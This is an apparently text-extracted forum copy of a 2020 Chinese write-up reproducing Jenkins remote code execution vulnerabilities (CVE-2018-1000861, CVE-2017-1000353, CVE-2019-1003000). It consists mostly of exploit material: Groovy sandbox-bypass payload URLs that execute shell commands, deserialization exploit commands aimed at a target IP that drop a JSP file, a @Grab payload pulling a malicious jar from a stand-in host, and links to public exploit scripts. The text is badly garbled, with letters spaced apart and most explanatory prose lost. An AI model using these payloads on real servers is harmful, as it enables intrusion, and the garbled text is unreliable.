[21156] 2020-07-24_Jenkins漏洞利用复现

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2020-07-24_Jenkins漏洞利用复现 J e n k i n s L e m o n S e c   2 0 2 0 - 0 7 - 2 4 访 访 访 u r l p o w e r s h e l l   p y t h o n s h e l l C V E - 2 0 1 8 - 1 0 0 0 8 6 1   p a y l o a d : & v a l u e = u r l h t t p : / / 1 7 2 . 1 6 . 2 0 . 1 3 4 : 8 0 8 0 / s c r i p t p r i n t l n   " l s   - a l " . e x e c u t e ( ) . t e x t s e c u r i t y R e a l m / u s e r / a d m i n / d e s c r i p t o r B y N a m e / o r g . j e n k i n s c i . p l u g i n s . s c r i p t s e c u r i t y . s a n d b o x . g r o o v y . S e c u r e G r o o v y S c r i p t / c h e c k S c r i p t ? s a n d b o x = t r u e & v a l u e = p u b l i c   c l a s s   x   {     p u b l i c   x ( ) {         " t o u c h   / t m p / s u c c e s s " . e x e c u t e ( )     } }
g e t p y t h o n C V E - 2 0 1 7 - 1 0 0 0 3 5 3   h t t p s : / / g i t h u b . c o m / v u l h u b / C V E - 2 0 1 7 - 1 0 0 0 3 5 3   h t t p s : / / s s d - d i s c l o s u r e . c o m / a r c h i v e s / 3 1 7 1 e x p l o i t . p y 使 l i n u x s h e l l h t t p s : / / g i t h u b . c o m / o r a n g e t w / a w e s o m e - j e n k i n s - r c e - 2 0 1 9 / b l o b / m a s t e r / e x p . p y #   s e r j a v a   - j a r   C V E - 2 0 1 7 - 1 0 0 0 3 5 3 - 1 . 1 - S N A P S H O T - a l l . j a r   1 . s e r   " t o u c h   / t m p / 1 . j s p "   #   s e r p y t h o n   e x p l o i t . p y   h t t p : / / 1 7 2 . 1 6 . 2 0 . 1 3 4 : 8 0 8 0   1 . s e r e c h o   b a s e 6 4   | b a s e 6 4   - d   >   1 . j s p
j s p C V E - 2 0 1 9 - 1 0 0 3 0 0 0     p o c . c o m J A R g r o u p m o d u l e v e r s i o n j a r v e r s i o n j a r 访 h t t p s : / / g i t h u b . c o m / w e t w 0 r k / E x p l o i t - D e v e l o p m e n t / b l o b / m a s t e r / C V E - 2 0 1 9 - 1 0 0 3 0 0 0 % 2 0 % 2 6 % 2 6 % 2 0 C V E - 2 0 1 8 - 1 9 9 9 0 0 2 % 2 0 - % 2 0 p r e A u t h % 2 0 J e n k i n s % 2 0 R C E / s p l o i t / j e n k i n s - p r e a u t h - r c e - e x p l o i t . p y h t t p s : / / g i t h u b . c o m / a d a m y o r d a n / c v e - 2 0 1 9 - 1 0 0 3 0 0 0 - j e n k i n s - r c e - p o c   h t t p : / / u r l . c o m / s e c u r i t y R e a l m / u s e r / a d m i n / d e s c r i p t o r B y N a m e / o r g . j e n k i n s c i . p l u g i n s . w o r k f l o w . c p s . C p s F l o w D e f i n i t i o n / c h e c k S c r i p t C o m p i l e ? v a l u e = @ G r a b C o n f i g ( d i s a b l e C h e c k s u m s = t r u e ) % 0 a @ G r a b R e s o l v e r ( n a m e = ' p a y l o a d ' ,   r o o t = ' h t t p : / / p o c . c o m ' ) % 0 a @ G r a b ( g r o u p = ' p a c k a g e ' ,   m o d u l e = ' p a y l o a d ' ,   v e r s i o n = ' 1 ' ) % 0 a i m p o r t   P a y l o a d ; h t t p s : / / w w w . c n b l o g s . c o m / j u n s e c / p / 1 1 5 9 3 5 5 6 . h t m l J u n s e c
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则